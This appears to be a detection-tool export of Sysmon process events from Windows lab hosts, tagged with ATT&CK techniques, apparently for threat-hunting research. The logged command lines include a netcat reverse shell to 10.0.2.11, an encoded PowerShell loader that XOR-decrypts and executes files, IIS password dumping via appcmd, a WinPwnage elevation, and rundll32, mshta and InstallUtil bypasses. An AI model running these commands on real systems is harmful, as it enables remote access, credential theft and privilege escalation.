+ +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.894473,2019-05-27T05:29:19.894473+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5970 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.834 + 365ABB72-3D6F-5CEB-0000-0010B2D3FF00 + 3848 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1557621150.227012,2019-05-12T04:32:30.227012+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16243 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 00:32:30.023 + 365ABB72-699E-5CD7-0000-001073582200 + 3876 + C:\Windows\System32\schtasks.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Manages scheduled tasks + 
Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\schtasks.exe" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-5DEC-5CD7-0000-00204A380100 + 0x1384a + 1 + High + SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9 + 365ABB72-6998-5CD7-0000-00104E422200 + 2740 + C:\Python27\python.exe + python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558969958.290374,2019-05-27T19:12:38.290374+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c whoami /groups ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6168 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:38.231 + 365ABB72-FE66-5CEB-0000-001058F50B00 + 3256 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c whoami /groups + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline 
( "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 556863 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-08-07 23:33:08.339 + 747F3D96-1834-610F-0000-00105FE5D300 + 6576 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1231-610F-0000-002057A80700 + 0x7a857 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-182D-610F-0000-00106F40D300 + 9932 + C:\Windows\SysWOW64\mshta.exe + "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 556863 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-08-07 23:33:08.339 + 747F3D96-1834-610F-0000-00105FE5D300 + 6576 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 
747F3D96-1231-610F-0000-002057A80700 + 0x7a857 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-182D-610F-0000-00106F40D300 + 9932 + C:\Windows\SysWOW64\mshta.exe + "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 556863 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-08-07 23:33:08.339 + 747F3D96-1834-610F-0000-00105FE5D300 + 6576 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1231-610F-0000-002057A80700 + 0x7a857 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-182D-610F-0000-00106F40D300 + 9932 + C:\Windows\SysWOW64\mshta.exe + "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.784314,2019-05-27T05:29:19.784314+04:00,,Threat,Low,Found User (IIS 
APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Line Number: 0" /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5967 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.714 + 365ABB72-3D6F-5CEB-0000-0010F2CFFF00 + 3844 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Line Number: 0" /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1589239346.761944,2020-05-12T03:22:26.761944+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 142033 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-11 23:22:26.451 + 747F3D96-DE32-5EB9-0000-00103FC14300 + 5252 + C:\Windows\System32\svchost.exe + 10.0.17763.1 (WinBuild.160101.0800) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-5461-5EBA-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 + 00000000-0000-0000-0000-000000000000 + 580 + ? + ? 
+ +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5435 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 12:06:55.471 + 747F3D96-78DF-5D45-0000-0010EF400401 + 4320 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-78DF-5D45-0000-0010BD350401 + 5756 + C:\Windows\System32\Dism.exe + "C:\Windows\system32\dism.exe" /online /norestart /apply-unattend:"C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1628379182.783518,2021-08-08T03:33:02.783518+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 556726 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-08-07 23:33:01.121 + 747F3D96-182D-610F-0000-00100344D300 + 11196 + C:\Windows\System32\svchost.exe + 10.0.17763.1 (WinBuild.160101.0800) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + svchost.exe + C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost + C:\Windows\system32\ + NT AUTHORITY\LOCAL 
SERVICE + 747F3D96-90AF-610F-0000-0020E5030000 + 0x3e5 + 0 + System + SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 + 00000000-0000-0000-0000-000000000000 + 632 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1603490287.601524,2020-10-24T01:58:07.601524+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\schtasks.exe ) through command line ( schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424079 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:57:36.627 + 747F3D96-51D0-5F93-0000-001079C05B00 + 8572 + C:\Windows\SysWOW64\schtasks.exe + 10.0.17763.1 (WinBuild.160101.0800) + Task Scheduler Configuration Tool + Microsoft® Windows® Operating System + Microsoft Corporation + schtasks.exe + schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers + C:\Users\IEUser\AppData\Local\Temp\tmp1375\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002085A50800 + 0x8a585 + 1 + High + SHA1=77F125CE5840293890E1359483C7104AADE25FA7,MD5=5BD86A7193D38880F339D4AFB1F9B63A,SHA256=72900A86F3BED7570AA708657A76DD76BB80B68DB543D303DA401AC6983E39CE,IMPHASH=012D1B3C5FD8B10F0F36DB7243A28CB8 + 747F3D96-51D0-5F93-0000-0010B2B35B00 + 5572 + C:\Windows\SysWOW64\cmd.exe + "C:\Windows\System32\cmd.exe" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564435988.318896,2019-07-30T01:33:08.318896+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4897 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:08.174 + 747F3D96-6614-5D3F-0000-001093CE8600 + 108 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.563997,2019-05-27T05:29:19.563997+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Line Number: 0" /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5964 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.513 + 365ABB72-3D6F-5CEB-0000-0010CFCAFF00 + 3892 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Line Number: 0" /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + 
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1589239343.719794,2020-05-12T03:22:23.719794+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 141993 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-11 23:21:56.654 + 747F3D96-DE14-5EB9-0000-001079154300 + 224 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe + c:\Users\IEUser\tools\PrivEsc\ + NT AUTHORITY\SYSTEM + 747F3D96-5461-5EBA-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DE14-5EB9-0000-00107C0F4300 + 4468 + C:\Users\IEUser\Tools\Misc\nc64.exe + c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243520 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + 
+ 2020-03-21 05:00:17.533 + 747F3D96-9F61-5E75-0000-00103D6F1E00 + 7124 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243520 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.533 + 747F3D96-9F61-5E75-0000-00103D6F1E00 + 7124 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s 
wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1218.005 ] Mshta found running in the system,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line ("C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}) and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\Explorer.EXE) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 556720 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-08-07 23:33:01.091 + 747F3D96-182D-610F-0000-00106F40D300 + 9932 + C:\Windows\SysWOW64\mshta.exe + 11.00.17763.1 (WinBuild.160101.0800) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + MSHTA.EXE + "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1231-610F-0000-002057A80700 + 0x7a857 + 1 + Medium + 